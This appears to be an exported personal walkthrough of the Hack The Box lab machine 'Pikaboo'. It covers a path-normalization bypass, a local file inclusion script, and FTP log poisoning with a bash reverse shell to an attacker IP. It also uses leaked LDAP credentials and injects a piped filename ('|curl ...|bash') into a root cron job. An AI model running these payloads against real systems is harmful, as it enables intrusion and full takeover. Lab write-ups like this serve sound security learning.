<![CDATA[Pikaboo]]>http://github.com/dylang/node-rsslib/media/favicon.pngPikabooWebpage HTML Export plugin for ObsidianMon, 11 Mar 2024 20:27:28 GMTMon, 11 Mar 2024 20:27:27 GMT60<![CDATA[pikaboo]]>Pasted image 20240210222822.png
The admin link
Pasted image 20240210222837.png
Even if we try anything after admin like 'adminqwer' it still requires authentication.
Pressing the cancel button ->
Pasted image 20240210222916.png
According to the nmap scan the website is nginx and the error redirects us to apache also that on port 81 some kind of proxy
Pasted image 20240210223029.png
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
Because even when going to /adminasdf it gives us a login prompt means there is a misconfiguration.
Pasted image 20240210223451.png
Same seems to be a case here there is no trailing slash after admin.
I ll try to access common apache files like server-status.
http://10.10.10.249/admin../server-status
Pasted image 20240210214347.png
There is request to admin_staging which looks interesting.
Pasted image 20240210214536.png
Pasted image 20240210223638.png
There is a lfi.
Pasted image 20240210223719.png
I ll write a script ->
import requests import re import base64 while True: i = input('> ') url = f'http://10.10.10.249/admin../admin_staging/index.php?page=php://filter/convert.base64-encode/resource={i}' r = requests.get(url) pattern = re.compile(r'nel">\n(.*?)</div>') match = pattern.finditer(r.text) #print(r.text) for matches in match: extracted_base64 = matches.group(1) decoded_bytes = base64.b64decode(extracted_base64) decoded_string = decoded_bytes.decode('utf-8') print(decoded_string) Copy
I was not able to view any files in /etc/ like /etc/passwd so I used a wordlist.
Gobuster for lfi interesting files.->
➜ script wfuzz -u http://10.10.10.249/admin../admin_staging/index.php\?page\=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.249/admin../admin_staging/index.php?page=FUZZ Total requests: 880 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000216: 200 413 L 1670 W 19803 Ch "/var/log/vsftpd.log" 000000217: 200 557 L 1381 W 169663 Ch "/var/log/wtmp" Total time: 0 Processed Requests: 880 Filtered Requests: 878 Requests/sec.: 0 Copy
Before reading the log file -> index.php file
The php file uses include to add a file
Pasted image 20240210224235.png
Which is a dangerous function as the function can help an attacker to execute php code if he/she can control the files on the server. Like In our case we can read vsftpd.log and also create a log as when we enter a wrong credential it gets in the ftp.log file and because the server uses include statement the attacker will be able to execute a code if inserted in ftp username.
Pasted image 20240210224452.png
I ll enter a php reverse shell in username
➜ script ftp 10.10.10.249 Connected to 10.10.10.249. 220 (vsFTPd 3.0.3) Name (10.10.10.249:nakul): <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.16/9001 0>&1'");?> 331 Please specify the password. Password: 530 Login incorrect. ftp: Login failed Copy
Now I ll reload the page
Pasted image 20240210224647.png
The page hangs and we get a reverse shell
Pasted image 20240210224707.png
www-data@pikaboo:/var/www/html/admin_staging$ netstat -tunlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 550/nginx: worker p tcp 0 0 127.0.0.1:81 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:389 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN 550/nginx: worker p tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - Copy
Ldap is open but I dont have creds,
Enumerating the server I found credentials in /opt/pokeapi/config/settings.py
LDAP creds->
Pasted image 20240211082852.png
ldapsearch -h 127.0.0.1 -x -s base namingcontexts -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g' # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: namingcontexts # # dn: namingContexts: dc=htb # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 Copy
ldapsearch -h 127.0.0.1 -x -b 'dc=htb' -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g' Copy
Pasted image 20240211083020.png
echo X0cwdFQ0X0M0dGNIXyczbV80bEwhXw== | base64 -d _G0tT4_C4tcH_'3m_4lL!_ Copy
The credentials were not of ssh, but rather they were of ftp
➜ Pikaboo ftp 10.10.10.249 Connected to 10.10.10.249. 220 (vsFTPd 3.0.3) Name (10.10.10.249:nakul): pwnmeow 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. Copy
Pasted image 20240211083237.png
I tried to find these folders in the server using www shell
www-data@pikaboo:/opt/pokeapi/config$ find / -type d 2>/dev/null | grep abilities /sys/devices/platform/i8042/serio0/input/input0/capabilities /sys/devices/platform/i8042/serio1/input/input3/capabilities /sys/devices/platform/i8042/serio1/input/input2/capabilities /sys/devices/platform/pcspkr/input/input5/capabilities /sys/devices/system/cpu/vulnerabilities /sys/devices/LNXSYSTM:00/LNXPWRBN:00/input/input4/capabilities /srv/ftp/conquest_pokemon_abilities /srv/ftp/abilities /srv/ftp/pokemon_abilities Copy
The ftp folders were connected to /srv/ftp folder.
I tried to put something in the / dir it did not work, but I am able to upload files in any other directory.
Linpeas told there is a cron running every minute
cat /etc/crontab
Pasted image 20240211084922.png
www-data@pikaboo:/opt/pokeapi/config$ cat /usr/local/bin/csvupdate_cron #!/bin/bash for d in /srv/ftp/* do cd $d /usr/local/bin/csvupdate $(basename $d) *csv /usr/bin/rm -rf * done Copy
It is calling /usr/bin/csvupdate, which is a perl script.
csvupdate.pl ->
Pasted image 20240211085057.png
The code is vulnerable to code execution the for(<>) part, This video explains the vulnerability -> https://youtu.be/iczIO8032VU?si=bLy2gsBE7YOZnleR
If I can inject a pipe | The code will execute anything I want.
I can control the parameter as i can upload files in any directory in /opt and running csvupdate on files that end with .csv I ll put a file use pipe to execute my command
#!/bin/bash for d in /srv/ftp/* do cd $d /usr/local/bin/csvupdate $(basename $d) *csv /usr/bin/rm -rf * done Copy
put hello.txt "|ping -c 1 10.10.14.6; asdf.csv" Copy
Pasted image 20240211081243.png
I got a ping request in a minute.
Pasted image 20240211081319.png
Now I need a shell.
put hello.txt "|curl 10.10.14.16|bash;asdf.csv" Copy
Pasted image 20240211081445.png
Pasted image 20240211081458.png
Got a root shell in a minute.
Pasted image 20240211085901.png
Root.]]>pikaboo.htmlpikaboo.mdSun, 11 Feb 2024 03:29:10 GMT<figure><img src="pasted-image-20240210222822.png"></figure>